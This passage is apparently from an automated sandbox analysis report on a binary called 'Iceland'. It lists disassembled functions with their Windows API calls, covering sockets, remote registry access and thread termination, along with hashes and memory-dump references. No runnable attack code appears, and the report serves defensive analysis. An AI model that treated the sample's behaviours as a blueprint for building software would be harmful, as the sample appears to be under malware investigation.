                                                                                                                                                                                                                                                                • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                • Instruction ID: 1a15aa2acabd01ff605db1b01f34ba6c47d8ca584401cc0bd4eb85287fae54a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1117C73541B04AAD630BBB0CE07FCB77EDBF15702F420D19BA99AA252DA74B5088750
                                                                                                                                                                                                                                                                Function 00A8E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A8E328
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00A8E32F
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A8E345
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00A8E34C
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A8E390
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00A8E36D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                • Opcode ID: 2d9b8055044a43c9f85f06274bf696d4f0a2b2f880d5030442a58340be706587
                                                                                                                                                                                                                                                                • Instruction ID: 8f48b31df305368e16883cec7706c42d563558c711cc8b2b1c9edc0c0913a488
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d9b8055044a43c9f85f06274bf696d4f0a2b2f880d5030442a58340be706587
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 550136F6900208BFE751E7E49D89EEB776CD708300F0046A2B749E6052F6749E854B75
                                                                                                                                                                                                                                                                Function 00A91312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00A91322
                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?), ref: 00A91334
                                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A91342
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A91350
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A9135F
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A9136F
                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 00A91376
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                • Opcode ID: a6c1ade4c66fd69c737800efb64678816759a1c72e022a7d7b1a51239aeb4fe7
                                                                                                                                                                                                                                                                • Instruction ID: 6e9d7f62bebcf5e12dbc54689c7573a4bf4785e33adbedcbbd3c982b6dd9190f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6c1ade4c66fd69c737800efb64678816759a1c72e022a7d7b1a51239aeb4fe7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F0FF32146612BBD7459F94EE4DBD6BB79FF04302F401221F201958B1D7749472CF90
                                                                                                                                                                                                                                                                Function 00AA26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AA281D
                                                                                                                                                                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AA283E
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA284F
                                                                                                                                                                                                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 00AA2938
                                                                                                                                                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00AA28E9
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8433E: _strlen.LIBCMT ref: 00A84348
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A9F669), ref: 00AA3C9D
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00AA2992
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                • Opcode ID: e19fa01d0f8426dae33bcf267fdacdee4407065c0088e9fd019faefd583ba88d
                                                                                                                                                                                                                                                                • Instruction ID: 304ca37655b46e1db939b9c9880b55e8d11de74f47b25a9ea23f292c9b51074b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e19fa01d0f8426dae33bcf267fdacdee4407065c0088e9fd019faefd583ba88d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4B1E435604300AFD324DF28C985F2ABBE5AF89358F54855CF4564B2E2DB31EE86CB91
                                                                                                                                                                                                                                                                Function 00A50527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00A5042A
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A50446
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00A5045D
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5047B
                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00A50492
                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A504B0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                • Instruction ID: b7aaba84f669f450caf65797821409fff566eb804ec90303b33537e3bebc6166
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C381D772600B059BE720AF69CD81F6A73B9BF54736F24412AFD11DB681E770D9088B94
                                                                                                                                                                                                                                                                Function 00A56571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A48649,00A48649,?,?,?,00A567C2,00000001,00000001,8BE85006), ref: 00A565CB
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A567C2,00000001,00000001,8BE85006,?,?,?), ref: 00A56651
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A5674B
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A56758
                                                                                                                                                                                                                                                                  • Part of subcall function 00A53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A56761
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A56786
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                • Opcode ID: f9bf91053ba9d9aca06ab369f4d7954660b3deeb0d64b7d7b412815be60a488a
                                                                                                                                                                                                                                                                • Instruction ID: a707ae181f1b0a2d1931279eed229a24409a7f209d37e2d233af8c53202b6823
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9bf91053ba9d9aca06ab369f4d7954660b3deeb0d64b7d7b412815be60a488a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB510472A00206AFEB258F64CD81FBB77AAFB98755F544668FC04D7140EB35DC58C6A0
                                                                                                                                                                                                                                                                Function 00AAC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC72A
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AAC785
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAC7CA
                                                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AAC7F9
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AAC853
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAC85F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                • Opcode ID: 951420bb30a48e5d84cc07f347a0581c6d48e5b94db12ca5fc897b331558d17b
                                                                                                                                                                                                                                                                • Instruction ID: 87408811c93325d101b1515115c1651153375be40050ea30ce0fac79549f8809
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 951420bb30a48e5d84cc07f347a0581c6d48e5b94db12ca5fc897b331558d17b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F81AF35208241AFD714DF24C985E2ABBF5FF89318F14856CF45A4B2A2DB31ED46CB91
                                                                                                                                                                                                                                                                Function 00A8009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000035), ref: 00A800A9
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A80150
                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00A80354,00000000), ref: 00A80179
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00A80354), ref: 00A8019D
                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00A80354,00000000), ref: 00A801A1
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A801AB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                • Opcode ID: 5f15a82a0fb96a2c2b3eb4772afd92894042bc651b98c2ac8d55e80c525c1994
                                                                                                                                                                                                                                                                • Instruction ID: e3fb5decaea457263522901bc6ee541088e8ac1060236ea423432907045a1fc6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f15a82a0fb96a2c2b3eb4772afd92894042bc651b98c2ac8d55e80c525c1994
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E451F935600310EBDFA4BB649889F69B3B5EF45310F248457FA06DF296EBB09C48CB56
                                                                                                                                                                                                                                                                Function 00A99B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00A99F2A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A99F4B
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A99F72
                                                                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00A99FCA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                                                                • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                • Opcode ID: 134cc4ab4636e18380f35f074e4a66924bdc027bdabb859e34879b8c7e7ffb0a
                                                                                                                                                                                                                                                                • Instruction ID: d55044deeec0b3815681e208a2d12b34f53f83f29718570525ed23461f6657b6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 134cc4ab4636e18380f35f074e4a66924bdc027bdabb859e34879b8c7e7ffb0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1E183316043509FDB24EF28D981B6BB7E5BF84314F04896DF8899B2A2DB31DD45CB92
                                                                                                                                                                                                                                                                Function 00A96ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A96F21
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00A9707E
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00AC0CC4,00000000,00000001,00AC0B34,?), ref: 00A97095
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A97319
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                • Opcode ID: 29d29176d858716297f76f316358bb1f9f1a9c6c2d8d7a8a927c6b8f702ab3d3
                                                                                                                                                                                                                                                                • Instruction ID: 8232a4f5ac9332a10baab0186f333b00a608f339fdaf665e29fd534f9fd923fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d29176d858716297f76f316358bb1f9f1a9c6c2d8d7a8a927c6b8f702ab3d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5D16871618211AFC704EF28D981E6BB7E8FF88704F40496DF5858B262DB71ED45CBA2
                                                                                                                                                                                                                                                                Function 00A21B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?,?), ref: 00A21B35
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A21B99
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A21BB6
                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A21BC7
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00A21C15
                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A63287
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21C2D: BeginPath.GDI32(00000000), ref: 00A21C4B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                • Opcode ID: 06bfb50c0bf323716d615158a48cee0f777aee7c4b1f3dc5a1dfba0ffb189064
                                                                                                                                                                                                                                                                • Instruction ID: 2c985e9d37b2a085d1cfd7ddbb271d35e73233535a2f7cb98589813877aaf859
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06bfb50c0bf323716d615158a48cee0f777aee7c4b1f3dc5a1dfba0ffb189064
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4541D071104310AFDB10DFA8ECC4FB67BB8EB65320F100669FA548B1B2D7709946DB61
                                                                                                                                                                                                                                                                Function 00A91196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A911B3
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A911EE
                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00A9120A
                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00A91283
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A9129A
                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A912C8
                                                                                                                                                                                                                                                                Memory Dump Source
